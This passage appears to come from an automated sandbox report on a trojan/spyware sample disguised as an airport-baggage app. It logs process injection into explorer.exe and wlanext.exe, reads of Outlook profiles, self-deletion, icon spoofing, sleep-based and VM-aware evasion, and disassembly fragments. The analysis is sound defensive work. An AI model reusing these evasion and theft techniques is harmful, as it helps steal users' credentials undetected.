          Source: C:\Users\user\Desktop\Product24573.exeProcess created: C:\Users\user\Desktop\Product24573.exe C:\Users\user\Desktop\Product24573.exe
          Source: C:\Users\user\Desktop\Product24573.exeProcess created: C:\Users\user\Desktop\Product24573.exe C:\Users\user\Desktop\Product24573.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: C:\Users\user\Desktop\Product24573.exeProcess created: C:\Users\user\Desktop\Product24573.exe C:\Users\user\Desktop\Product24573.exeJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess created: C:\Users\user\Desktop\Product24573.exe C:\Users\user\Desktop\Product24573.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exeJump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0bf754aa-c967-445c-ab3d-d8fda9bae7ef}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Product24573.exe.logJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeFile created: C:\Users\user\AppData\Local\Temp\-15B7L5MNMJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@6/3
          Source: Product24573.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
          Source: C:\Users\user\Desktop\Product24573.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: Product24573.exeString found in binary or memory: *resources/loading.png!V
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: Product24573.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Product24573.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Product24573.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdbeex.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: explorer.exe, 00000003.00000002.670229855.00007FFC1B351000.00000020.00000001.01000000.0000000A.sdmp
          Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdb source: explorer.exe, 00000003.00000002.670229855.00007FFC1B351000.00000020.00000001.01000000.0000000A.sdmp
          Source: Binary string: lJJaU.pdb source: Product24573.exe
          Source: Binary string: wntdll.pdbUGP source: Product24573.exe, 00000002.00000003.397760095.0000000000DA2000.00000004.00000020.00020000.00000000.sdmp, Product24573.exe, 00000002.00000003.399612512.0000000000F30000.00000004.00000020.00020000.00000000.sdmp, Product24573.exe, 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000006.00000003.440146096.00000000009C4000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000006.00000003.438342369.000000000082F000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000006.00000002.650882125.0000000002F4F000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000006.00000002.650882125.0000000002E30000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Product24573.exe, Product24573.exe, 00000002.00000003.397760095.0000000000DA2000.00000004.00000020.00020000.00000000.sdmp, Product24573.exe, 00000002.00000003.399612512.0000000000F30000.00000004.00000020.00020000.00000000.sdmp, Product24573.exe, 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000006.00000003.440146096.00000000009C4000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000006.00000003.438342369.000000000082F000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000006.00000002.650882125.0000000002F4F000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000006.00000002.650882125.0000000002E30000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wlanext.pdb source: Product24573.exe, 00000002.00000002.440678675.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, Product24573.exe, 00000002.00000002.438590358.0000000000CAA000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000006.00000002.650765520.0000000000E10000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: eex.pdb source: explorer.exe, 00000003.00000002.670229855.00007FFC1B351000.00000020.00000001.01000000.0000000A.sdmp
          Source: Binary string: lJJaU.pdbSHA256 source: Product24573.exe
          Source: Binary string: wlanext.pdbGCTL source: Product24573.exe, 00000002.00000002.440678675.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, Product24573.exe, 00000002.00000002.438590358.0000000000CAA000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000006.00000002.650765520.0000000000E10000.00000040.80000000.00040000.00000000.sdmp

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: Product24573.exe, AirportBaggage/MainForm.cs.Net Code: InitializeComponent System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.0.Product24573.exe.e60000.0.unpack, AirportBaggage/MainForm.cs.Net Code: InitializeComponent System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 0_2_033927A0 push eax; mov dword ptr [esp], ecx0_2_033927A4
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 0_2_03392790 push eax; mov dword ptr [esp], ecx0_2_033927A4
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0041085A push ds; ret 2_2_0041085B
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0041A8A6 push edi; retf 2_2_0041A8AC
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0041B316 push edx; iretd 2_2_0041B320
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0041BCF6 push ss; iretd 2_2_0041BCFE
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0041B482 pushad ; retf 2_2_0041B48C
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0041AD04 push esi; iretd 2_2_0041AD0A
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_00422DFE push ebp; retf 0000h2_2_00422E06
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_00401DB0 push eax; ret 2_2_00401DB2
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_00405EEF push ds; ret 2_2_00405EFF
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_00410756 pushad ; retf 2_2_00410757
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_004117F6 push ss; ret 2_2_004117FE
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0114D0D1 push ecx; ret 2_2_0114D0E4
          Source: initial sampleStatic PE information: section name: .text entropy: 7.7813901461622725

          Hooking and other Techniques for Hiding and Protection

          barindex
          Icon mismatch, binary includes an icon from a different legit application in order to fool users
          Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (58).png
          Deletes itself after installation
          Source: C:\Windows\SysWOW64\wlanext.exeFile deleted: c:\users\user\desktop\product24573.exeJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exe TID: 5560Thread sleep time: -41202s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exe TID: 4988Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 3076Thread sleep time: -50000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01126B90 rdtsc 2_2_01126B90
          Source: C:\Users\user\Desktop\Product24573.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 875Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 874Jump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeAPI coverage: 6.6 %
          Source: C:\Users\user\Desktop\Product24573.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeThread delayed: delay time: 41202Jump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000003.00000000.420012640.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
          Source: explorer.exe, 00000003.00000002.662954912.000000000F432000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.576101268.000000000F440000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllxA
          Source: explorer.exe, 00000003.00000002.662537517.000000000F270000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.420012640.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000003.571786290.0000000007166000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000003.00000000.420012640.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
          Source: explorer.exe, 00000003.00000002.660713347.000000000901E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
          Source: explorer.exe, 00000003.00000002.651772216.0000000005063000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
          Source: explorer.exe, 00000003.00000002.660713347.000000000901E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000003.00000000.402942272.0000000001425000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01126B90 rdtsc 2_2_01126B90
          Source: C:\Users\user\Desktop\Product24573.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_010F9100 mov eax, dword ptr fs:[00000030h]2_2_010F9100
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_010F9100 mov eax, dword ptr fs:[00000030h]2_2_010F9100
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_010F9100 mov eax, dword ptr fs:[00000030h]2_2_010F9100
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0112513A mov eax, dword ptr fs:[00000030h]2_2_0112513A
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0112513A mov eax, dword ptr fs:[00000030h]2_2_0112513A
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01114120 mov eax, dword ptr fs:[00000030h]2_2_01114120
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01114120 mov eax, dword ptr fs:[00000030h]2_2_01114120
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01114120 mov eax, dword ptr fs:[00000030h]2_2_01114120
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01114120 mov eax, dword ptr fs:[00000030h]2_2_01114120
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01114120 mov ecx, dword ptr fs:[00000030h]2_2_01114120
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0111B944 mov eax, dword ptr fs:[00000030h]2_2_0111B944
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0111B944 mov eax, dword ptr fs:[00000030h]2_2_0111B944
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_010FC962 mov eax, dword ptr fs:[00000030h]2_2_010FC962
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_010FB171 mov eax, dword ptr fs:[00000030h]2_2_010FB171
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_010FB171 mov eax, dword ptr fs:[00000030h]2_2_010FB171
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01122990 mov eax, dword ptr fs:[00000030h]2_2_01122990
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0111C182 mov eax, dword ptr fs:[00000030h]2_2_0111C182
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0112A185 mov eax, dword ptr fs:[00000030h]2_2_0112A185
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011751BE mov eax, dword ptr fs:[00000030h]2_2_011751BE
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011751BE mov eax, dword ptr fs:[00000030h]2_2_011751BE
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011751BE mov eax, dword ptr fs:[00000030h]2_2_011751BE
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011751BE mov eax, dword ptr fs:[00000030h]2_2_011751BE
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011199BF mov ecx, dword ptr fs:[00000030h]2_2_011199BF
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011199BF mov ecx, dword ptr fs:[00000030h]2_2_011199BF
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011199BF mov eax, dword ptr fs:[00000030h]2_2_011199BF
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011199BF mov ecx, dword ptr fs:[00000030h]2_2_011199BF
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011199BF mov ecx, dword ptr fs:[00000030h]2_2_011199BF
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011199BF mov eax, dword ptr fs:[00000030h]2_2_011199BF
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011199BF mov ecx, dword ptr fs:[00000030h]2_2_011199BF
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011199BF mov ecx, dword ptr fs:[00000030h]2_2_011199BF
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011199BF mov eax, dword ptr fs:[00000030h]2_2_011199BF
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011199BF mov ecx, dword ptr fs:[00000030h]2_2_011199BF
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011199BF mov ecx, dword ptr fs:[00000030h]2_2_011199BF
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011199BF mov eax, dword ptr fs:[00000030h]2_2_011199BF
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011769A6 mov eax, dword ptr fs:[00000030h]2_2_011769A6
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011261A0 mov eax, dword ptr fs:[00000030h]2_2_011261A0
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011261A0 mov eax, dword ptr fs:[00000030h]2_2_011261A0
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011B49A4 mov eax, dword ptr fs:[00000030h]2_2_011B49A4
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011B49A4 mov eax, dword ptr fs:[00000030h]2_2_011B49A4
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011B49A4 mov eax, dword ptr fs:[00000030h]2_2_011B49A4
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011B49A4 mov eax, dword ptr fs:[00000030h]2_2_011B49A4
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_010FB1E1 mov eax, dword ptr fs:[00000030h]2_2_010FB1E1
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_010FB1E1 mov eax, dword ptr fs:[00000030h]2_2_010FB1E1
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_010FB1E1 mov eax, dword ptr fs:[00000030h]2_2_010FB1E1
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011841E8 mov eax, dword ptr fs:[00000030h]2_2_011841E8
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01177016 mov eax, dword ptr fs:[00000030h]2_2_01177016
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01177016 mov eax, dword ptr fs:[00000030h]2_2_01177016
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01177016 mov eax, dword ptr fs:[00000030h]2_2_01177016
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011C4015 mov eax, dword ptr fs:[00000030h]2_2_011C4015
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011C4015 mov eax, dword ptr fs:[00000030h]2_2_011C4015
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0111A830 mov eax, dword ptr fs:[00000030h]2_2_0111A830
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0111A830 mov eax, dword ptr fs:[00000030h]2_2_0111A830
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0111A830 mov eax, dword ptr fs:[00000030h]2_2_0111A830
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0111A830 mov eax, dword ptr fs:[00000030h]2_2_0111A830
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0110B02A mov eax, dword ptr fs:[00000030h]2_2_0110B02A
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0110B02A mov eax, dword ptr fs:[00000030h]2_2_0110B02A
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0110B02A mov eax, dword ptr fs:[00000030h]2_2_0110B02A
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0110B02A mov eax, dword ptr fs:[00000030h]2_2_0110B02A
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0112002D mov eax, dword ptr fs:[00000030h]2_2_0112002D
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0112002D mov eax, dword ptr fs:[00000030h]2_2_0112002D
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0112002D mov eax, dword ptr fs:[00000030h]2_2_0112002D
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0112002D mov eax, dword ptr fs:[00000030h]2_2_0112002D
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0112002D mov eax, dword ptr fs:[00000030h]2_2_0112002D
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01110050 mov eax, dword ptr fs:[00000030h]2_2_01110050
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01110050 mov eax, dword ptr fs:[00000030h]2_2_01110050
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011B2073 mov eax, dword ptr fs:[00000030h]2_2_011B2073
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011C1074 mov eax, dword ptr fs:[00000030h]2_2_011C1074
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_010F9080 mov eax, dword ptr fs:[00000030h]2_2_010F9080
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01173884 mov eax, dword ptr fs:[00000030h]2_2_01173884
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_01173884 mov eax, dword ptr fs:[00000030h]2_2_01173884
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0112F0BF mov ecx, dword ptr fs:[00000030h]2_2_0112F0BF
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0112F0BF mov eax, dword ptr fs:[00000030h]2_2_0112F0BF
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0112F0BF mov eax, dword ptr fs:[00000030h]2_2_0112F0BF
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011220A0 mov eax, dword ptr fs:[00000030h]2_2_011220A0
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011220A0 mov eax, dword ptr fs:[00000030h]2_2_011220A0
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011220A0 mov eax, dword ptr fs:[00000030h]2_2_011220A0
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011220A0 mov eax, dword ptr fs:[00000030h]2_2_011220A0
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011220A0 mov eax, dword ptr fs:[00000030h]2_2_011220A0
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011220A0 mov eax, dword ptr fs:[00000030h]2_2_011220A0
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_011390AF mov eax, dword ptr fs:[00000030h]2_2_011390AF
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0118B8D0 mov eax, dword ptr fs:[00000030h]2_2_0118B8D0
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0118B8D0 mov ecx, dword ptr fs:[00000030h]2_2_0118B8D0
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0118B8D0 mov eax, dword ptr fs:[00000030h]2_2_0118B8D0
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0118B8D0 mov eax, dword ptr fs:[00000030h]2_2_0118B8D0
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0118B8D0 mov eax, dword ptr fs:[00000030h]2_2_0118B8D0
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_0118B8D0 mov eax, dword ptr fs:[00000030h]2_2_0118B8D0
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_010F58EC mov eax, dword ptr fs:[00000030h]2_2_010F58EC
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_010F40E1 mov eax, dword ptr fs:[00000030h]2_2_010F40E1
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_010F40E1 mov eax, dword ptr fs:[00000030h]2_2_010F40E1
          Source: C:\Users\user\Desktop\Product24573.exeCode function: 2_2_010F40E1 mov eax, dword ptr fs:[00000030h]2_2_010F40E1
